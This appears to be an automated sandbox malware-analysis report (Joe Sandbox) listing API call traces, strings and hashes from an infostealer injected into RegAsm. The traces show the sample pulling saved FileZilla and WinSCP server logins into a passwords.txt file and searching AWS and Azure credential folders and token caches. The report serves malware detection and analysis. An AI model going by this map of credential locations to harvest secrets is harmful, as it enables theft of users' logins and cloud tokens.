                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040FD58: LocalAlloc.KERNEL32(00000040,004120FA,00000001,00000000,?,004120F9,00000000,00000000), ref: 0040FD71
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0040AD52
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00424C83,00424C82,00424C7F,00424C7E), ref: 0040ADA6
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040ADAD
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040ADC1
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040ADCC
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040AE04
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AE0F
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 0040AE4D
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AE58
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040AE96
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AEA5
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040B0A0
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • memset.MSVCRT ref: 0040B0F3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                                                                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                • API String ID: 486015307-935134978
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040D83D
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D866
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D886
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D89A
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8AE
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8CB
                                                                                                                                                                                                • memset.MSVCRT ref: 0040D8DC
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040D904
                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040D92C
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040D973
                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040D990
                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00424C4E), ref: 0040DA22
                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040DA74
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$Value$Open$EnumH_prolog
                                                                                                                                                                                                • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                • API String ID: 784052110-2798830873
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040842D
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040852D
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00408535
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408541
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040854B
                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040855C
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408568
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040856F
                                                                                                                                                                                                • StrStrA.SHLWAPI(?), ref: 00408581
                                                                                                                                                                                                • StrStrA.SHLWAPI(-00000010), ref: 0040859B
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 004085AF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004085C1
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DA0), ref: 004085CF
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004085E1
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DA4), ref: 004085EF
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 004085FE
                                                                                                                                                                                                • lstrcat.KERNEL32(?,-00000010), ref: 00408608
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DA8), ref: 00408616
                                                                                                                                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 00408626
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000014), ref: 00408636
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040864A
                                                                                                                                                                                                  • Part of subcall function 0040832A: memset.MSVCRT ref: 00408351
                                                                                                                                                                                                  • Part of subcall function 0040832A: lstrlenA.KERNEL32(00408656,00000001,?,00000014,00000000,00000000,?,00408656,00000014), ref: 0040836B
                                                                                                                                                                                                  • Part of subcall function 0040832A: CryptStringToBinaryA.CRYPT32(00408656,00000000,?,00408656,00000014), ref: 00408375
                                                                                                                                                                                                  • Part of subcall function 0040832A: memcpy.MSVCRT ref: 004083DD
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040865B
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DAC), ref: 00408669
                                                                                                                                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 00408679
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000014), ref: 00408689
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 0040869D
                                                                                                                                                                                                  • Part of subcall function 0040832A: lstrcat.KERNEL32(00424BDF,00424BE3), ref: 00408404
                                                                                                                                                                                                  • Part of subcall function 0040832A: lstrcat.KERNEL32(00424BDF,00424BE6), ref: 0040841C
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004086AE
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DB0), ref: 004086BC
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DB4), ref: 004086CA
                                                                                                                                                                                                • StrStrA.SHLWAPI(-000000FE), ref: 004086DA
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 004086F0
                                                                                                                                                                                                • memset.MSVCRT ref: 00408743
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040874C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$Filelstrcpy$H_prologlstrlen$HeapPointermemset$AllocBinaryCloseCryptHandleProcessReadSizeStringmemcpy
                                                                                                                                                                                                • String ID: passwords.txt
                                                                                                                                                                                                • API String ID: 2199717062-347816968
                                                                                                                                                                                                • Opcode ID: 6e4a667533346ac0f5859deab80df632c1508782ce65bd4c710a45f3a3a326f6
                                                                                                                                                                                                • Instruction ID: 4cb9c01856663f2d3d296e6bf867e5005dd0c34532cecdf588301216e44e64e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e4a667533346ac0f5859deab80df632c1508782ce65bd4c710a45f3a3a326f6
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAA15972800129EFDB01EBA1DD4AEEE7F7AFF19304F10182AF511A21A1DB750A15DB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
                                                                                                                                                                                                • API String ID: 0-209218429
                                                                                                                                                                                                • Opcode ID: 682db500afecb686c8b0fb0c1c3258d1abf666f186ba9134499ddc06cda3183b
                                                                                                                                                                                                • Instruction ID: ae3fd1efd63f099223a886612802c4e3fb341daac595dfb5b8a26adb63c33cb1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 682db500afecb686c8b0fb0c1c3258d1abf666f186ba9134499ddc06cda3183b
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4F10A756003419FDB149F24E881B9BBBF8FF98318F44492DED8A87201D735E959CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
                                                                                                                                                                                                • API String ID: 0-1613945299
                                                                                                                                                                                                • Opcode ID: 5ce2280f04b2c4de571e5758652d51e44d99815295ff982505769a9ef2270e1c
                                                                                                                                                                                                • Instruction ID: c0718d8091d3d17c099cf539590a06cb9928f5fb099d8682cda0e2830a9270d5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ce2280f04b2c4de571e5758652d51e44d99815295ff982505769a9ef2270e1c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF106B1908344ABDB048F64DD41FEFB7EAAF89704F04CA1DF9C496241E639E9458B63
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,%s$CREATE TABLE x(_shape$_node
                                                                                                                                                                                                • API String ID: 0-1242591684
                                                                                                                                                                                                • Opcode ID: dc9d89105961e2456e9e4d86def8b3d84e0400b89c319c1eb14f95a28f4cc2d5
                                                                                                                                                                                                • Instruction ID: 37c8096c43508955b700f2c38d5ed2a46673f1a7f38b82f86dc220e24d3262d0
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9d89105961e2456e9e4d86def8b3d84e0400b89c319c1eb14f95a28f4cc2d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: F4C1F2B5500301ABEB109F64DCC9B977BB8FF9431AF04452CED8A86321D736E959CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                                                                                • API String ID: 0-900822179
                                                                                                                                                                                                • Opcode ID: 6e5ee7087c2f6be32a926b73e523c7a0a10f048773ef82efb8e513c441091237
                                                                                                                                                                                                • Instruction ID: bbd446b26550258dbeb8a021221716067557f7feb84151dff2dcb5a3d52eedb2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5ee7087c2f6be32a926b73e523c7a0a10f048773ef82efb8e513c441091237
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7991E6B19083059BEB04CF24C8C1BEBBBE5AF59705F54498DE895CB252D332E946C7B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                • API String ID: 0-449611708
                                                                                                                                                                                                • Opcode ID: f18d4ea07c2ab62da686cedbcecf2f1f2c3e4107567e280d7a4d1e950be6dcc6
                                                                                                                                                                                                • Instruction ID: 062053bfd1bfa9432cd9a8194b4f1d99e4795ccf72b734f7b02ce9e64bec9f00
                                                                                                                                                                                                • Opcode Fuzzy Hash: f18d4ea07c2ab62da686cedbcecf2f1f2c3e4107567e280d7a4d1e950be6dcc6
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB514CB0B0430167EB102F75ACC5FDB7AA86F74619F00813CFDDAA6341E768E519C2A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00415802
                                                                                                                                                                                                • memset.MSVCRT ref: 00415822
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00415848
                                                                                                                                                                                                • lstrcat.KERNEL32(?,\.azure\), ref: 00415865
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0041531B: _EH_prolog.MSVCRT ref: 00415320
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 00415340
                                                                                                                                                                                                  • Part of subcall function 0041531B: FindFirstFileA.KERNEL32(?,?), ref: 00415357
                                                                                                                                                                                                  • Part of subcall function 0041531B: StrCmpCA.SHLWAPI(?,00425854), ref: 00415374
                                                                                                                                                                                                  • Part of subcall function 0041531B: StrCmpCA.SHLWAPI(?,00425858), ref: 0041538E
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 004153B2
                                                                                                                                                                                                  • Part of subcall function 0041531B: StrCmpCA.SHLWAPI(?,004254BF), ref: 004153C3
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 004153E0
                                                                                                                                                                                                  • Part of subcall function 0041531B: PathMatchSpecA.SHLWAPI(?,?), ref: 00415407
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,?), ref: 00415433
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,00425870), ref: 00415445
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,?), ref: 00415455
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,00425874), ref: 00415467
                                                                                                                                                                                                  • Part of subcall function 0041531B: lstrcat.KERNEL32(?,?), ref: 0041547B
                                                                                                                                                                                                • memset.MSVCRT ref: 004158A0
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004158CB
                                                                                                                                                                                                • lstrcat.KERNEL32(?,\.aws\), ref: 004158E8
                                                                                                                                                                                                  • Part of subcall function 0041531B: wsprintfA.USER32 ref: 004153F4
                                                                                                                                                                                                • memset.MSVCRT ref: 00415923
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0041594E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0041596B
                                                                                                                                                                                                  • Part of subcall function 0041531B: FindNextFileA.KERNEL32(00000000,?), ref: 00415616
                                                                                                                                                                                                  • Part of subcall function 0041531B: FindClose.KERNEL32(00000000), ref: 00415625
                                                                                                                                                                                                • memset.MSVCRT ref: 004159A6
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                • API String ID: 2836893066-974132213
                                                                                                                                                                                                • Opcode ID: 5c309d8917c2dbb9d2bc30700055216cedeab1c1bd0d7ed21c405cdb9ab650f4
                                                                                                                                                                                                • Instruction ID: fa8c46e6e26b95153925fc6919cb1346faf9ea8fd1a5faa0a0639d946a624cc1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c309d8917c2dbb9d2bc30700055216cedeab1c1bd0d7ed21c405cdb9ab650f4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 864192B1D4022CAADB01FBE1DC46EEE7B7CAF1C304F4005ABB555E3182DA7897588B65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                • API String ID: 0-2933911573
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1B4B2DA4
                                                                                                                                                                                                • misuse, xrefs: 1B4B2E73
                                                                                                                                                                                                • NULL, xrefs: 1B4B2E38
                                                                                                                                                                                                • invalid, xrefs: 1B4B2E4E
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4B2E5A
                                                                                                                                                                                                • unopened, xrefs: 1B4B2E55
                                                                                                                                                                                                • WHERE name=%Q, xrefs: 1B4B2DB7
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4B2E78
                                                                                                                                                                                                • ORDER BY name, xrefs: 1B4B2DCC
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4B2E69
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                                                                                                                                                • API String ID: 0-1179878930
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004087AA
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089FA
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00408A01
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00408B24
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DDC), ref: 00408B32
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00408B44
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00424DE0), ref: 00408B52
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00408C65
                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 00408C73
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                • memset.MSVCRT ref: 00408CCB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1592390033-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004107D2
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410803
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041089B
